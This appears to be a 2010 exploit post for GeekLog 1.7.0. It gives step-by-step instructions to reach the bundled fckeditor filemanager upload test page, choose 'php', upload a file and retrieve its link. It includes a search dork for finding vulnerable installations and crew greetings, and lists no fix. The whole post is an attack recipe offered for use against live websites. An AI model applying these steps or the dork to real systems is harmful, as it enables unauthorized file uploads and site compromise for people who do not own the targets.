GeekLog 1.7.0 (fckeditor) Arbitrary File Upload Vulnerability

2010-10-18 19:15:06

###################################################
# db 88 88 ,ad8888ba, #
# d88b 88 88 d8"' `"8b #
# d8'`8b 88 88 d8' #
# d8' `8b 88aaaaaaaa88 88 #
# d8YaaaaY8b 88""""""""88 88 88888 #
# d8""""""""8b 88 88 Y8, 88 #
# d8' `8b 88 88 Y8a. .a88 #
# d8' `8b 88 88 `"Y88888P" #
# #
# #
###################################################
#
# Exploit Title: Geeklog
# Date: 18-10-2010
# Author: Kubanezi AHG
# Software Link: http://www.geeklog.net/
# Version: 1.7.0
# Tested on: Linux Ubuntu 9.04
# dork : inurl:"/geeklog/"
# Contact: [email protected]
#
####################################################

exploit # geeklog/fckeditor/editor/filemanager/upload/test.html


first go to # http://site.com/Geeklog/


then # http://site.com/Geeklog/fckeditor/editor/filemanager/upload/test.html

select # "php"


Upload There Hacked.txt And Copy Output Link

#######################################################
Exploit By Kubanezi
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Greetz : AHG-Crew , Mistreriozi , Boom ,Twilight , AutoruN , DoctorSQl
, Drake , Dj-Dukli , EragoN , Khaled , MossaD , BH-TREX

Fixes

No fixes

In order to submit a new fix you need to be registered.